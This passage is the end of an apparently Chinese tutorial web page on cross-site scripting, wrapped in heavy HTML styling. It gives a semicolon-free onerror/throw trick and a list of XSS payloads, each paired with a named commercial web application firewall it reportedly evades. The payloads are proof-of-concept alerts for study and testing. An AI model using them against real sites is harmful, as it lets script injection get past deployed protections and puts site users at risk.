sans-serif;font-size:16px;line-height:36px;;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 4;text-align: start;text-indent: 0px;text-transform: none;white-space: pre-wrap;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font family: var(--monospace);text-align: left;vertical-align: initial;border-color: rgb(231, 234, 237);border-style: solid;border-width: 1px;background-color: rgb(243, 244, 244);border-radius: 3px;padding: 0px 2px;font-size: 0.9em;">onerror</code></span><span class="md-plain" style="box-sizing: border-box;color: rgb(51, 51, 51);font family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size:16px;line-height:36px;;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 4;text-align: start;text-indent: 0px;text-transform: none;white-space: pre-wrap;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-style: initial;text-decoration-color: initial;">整体放入花括号中。这样就避免了使用分号:</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li></ul><pre class="code-snippet__js" data-lang="xml"><code><span class="code-snippet_outer"><span class="code-snippet__tag"><<span class="code-snippet__name">script</span>></span><span class="javascript">{onerror=alert}<span class="code-snippet__keyword">throw</span> <span class="code-snippet__number">1337</span></span><span class="code-snippet__tag"></<span class="code-snippet__name">script</span>></span></span></code></pre></section><p><br/></p><section style="max-width: 100%;box-sizing: border-box;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);word-wrap: break-word !important;"><section class="" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="padding-right: 20px;padding-left: 20px;max-width: 100%;box-sizing: border-box;line-height: 0.8;word-wrap: break-word !important;"><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;text-align: center;word-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box;color: rgb(26, 173, 25);font-size:24px;line-height:44px;;word-wrap: break-word !important;">12<br/></span></p><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;text-align: center;word-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box;letter-spacing: 0px;color: rgb(26, 173, 25);font-size:20px;line-height:40px;;word-wrap: break-word !important;">—</span></p></section></section></section></section><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);box-sizing: border-box !important;word-wrap: break-word !important;"><br style="max-width: 100%;box-sizing: border-box !important;word-wrap: break-word !important;"/></p><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><span style="box-sizing: border-box;font-size:20px;line-height:40px;;">常见的waf bypass</span></p><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><span style="box-sizing: border-box;font-size:20px;line-height:40px;;"><br/></span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="xml"><code><span class="code-snippet_outer">WAF名称:Cloudflare</span></code><code><span class="code-snippet_outer">Payload:<span class="code-snippet__tag"><<span class="code-snippet__name">a”</span>/<span class="code-snippet__attr">onclick</span>=<span class="code-snippet__string">(confirm)()</span>></span>click</span></code><code><span class="code-snippet_outer">绕过技术:非空格填充</span></code><code><span class="code-snippet_outer">WAF名称:Wordfence</span></code><code><span class="code-snippet_outer">Payload:<span class="code-snippet__tag"><<span class="code-snippet__name">a</span>/<span class="code-snippet__attr">href</span>=<span class="code-snippet__string">javascript&colon;alert()</span>></span>click</span></code><code><span class="code-snippet_outer">绕过技术:数字字符编码</span></code><code><span class="code-snippet_outer">WAF名称:Barracuda</span></code><code><span class="code-snippet_outer">Payload:<span class="code-snippet__tag"><<span class="code-snippet__name">a</span>/<span class="code-snippet__attr">href</span>=<span class="code-snippet__string">&#74;ava%0a%0d%09script&colon;alert()</span>></span>click</span></code><code><span class="code-snippet_outer">绕过技术:数字字符编码</span></code><code><span class="code-snippet_outer">WAF名称:Akamai</span></code><code><span class="code-snippet_outer">Payload:<span class="code-snippet__tag"><<span class="code-snippet__name">d3v</span>/<span class="code-snippet__attr">onauxclick</span>=<span class="code-snippet__string">.some(confirm)</span>></span>click</span></code><code><span class="code-snippet_outer">绕过技术:黑名单中缺少事件处理器以及函数调用混淆</span></code><code><span class="code-snippet_outer">WAF名称:Comodo</span></code><code><span class="code-snippet_outer">Payload:<span class="code-snippet__tag"><<span class="code-snippet__name">d3v</span>/<span class="code-snippet__attr">onauxclick</span>=<span class="code-snippet__string">(((confirm)))“</span>></span>click</span></code><code><span class="code-snippet_outer">绕过技术:黑名单中缺少事件处理器以及函数调用混淆</span></code><code><span class="code-snippet_outer">WAF名称:F5</span></code><code><span class="code-snippet_outer">Payload:<span class="code-snippet__tag"><<span class="code-snippet__name">d3v</span>/<span class="code-snippet__attr">onmouseleave</span>=<span class="code-snippet__string">.some(confirm)</span>></span>click</span></code><code><span class="code-snippet_outer">绕过技术:黑名单中缺少事件处理器以及函数调用混淆</span></code><code><span class="code-snippet_outer">WAF名称:ModSecurity</span></code><code><span class="code-snippet_outer">Payload:<span class="code-snippet__tag"><<span class="code-snippet__name">details</span>/<span class="code-snippet__attr">open</span>/<span class="code-snippet__attr">ontoggle</span>=<span class="code-snippet__string">alert()</span>></span></span></code><code><span class="code-snippet_outer">绕过技术:黑名单中缺少标签或事件处理器</span></code><code><span class="code-snippet_outer">WAF名称:dotdefender</span></code><code><span class="code-snippet_outer">Payload:<span class="code-snippet__tag"><<span class="code-snippet__name">details</span>/<span class="code-snippet__attr">open</span>/<span class="code-snippet__attr">ontoggle</span>=<span class="code-snippet__string">(confirm)()//</span></span></span></code></pre></section><p><br/></p><section style="max-width: 100%;box-sizing: border-box;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);word-wrap: break-word !important;"><section class="" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="max-width: 100%;box-sizing: border-box;word-wrap: break-word !important;"><section class="" style="padding-right: 20px;padding-left: 20px;max-width: 100%;box-sizing: border-box;line-height: 0.8;word-wrap: break-word !important;"><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;text-align: center;word-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box;color: rgb(26, 173, 25);font-size:24px;line-height:44px;;word-wrap: break-word !important;">13<br/></span></p><p style="max-width: 100%;box-sizing: border-box;min-height: 1em;text-align: center;word-wrap: break-word !important;"><span style="max-width: 100%;box-sizing: border-box;letter-spacing: 0px;color: rgb(26, 173, 25);font-size:20px;line-height:40px;;word-wrap: break-word !important;">—</span></p></section></section></section></section><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);box-sizing: border-box !important;word-wrap: break-word !important;"><br style="max-width: 100%;box-sizing: border-box !important;word-wrap: break-word !important;"/></p><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><span style="box-sizing: border-box;font-size:20px;line-height:40px;;">总结</span></p><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><span style="box-sizing: border-box;font-size:20px;line-height:40px;;"><br/></span></p><p style="max-width: 100%;min-height: 1em;color: rgb(62, 62, 62);font-size:16px;line-height:36px;;white-space: normal;background-color: rgb(255, 255, 255);text-align: left;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="box-sizing: border-box;font-size:16px;line-height:36px;;">一直说理论肯定有些枯燥,明天更新相关案例,未完待续。。。</span></p><p><br/></p>
</div>
</div>
</body>
</html>
页:
[1]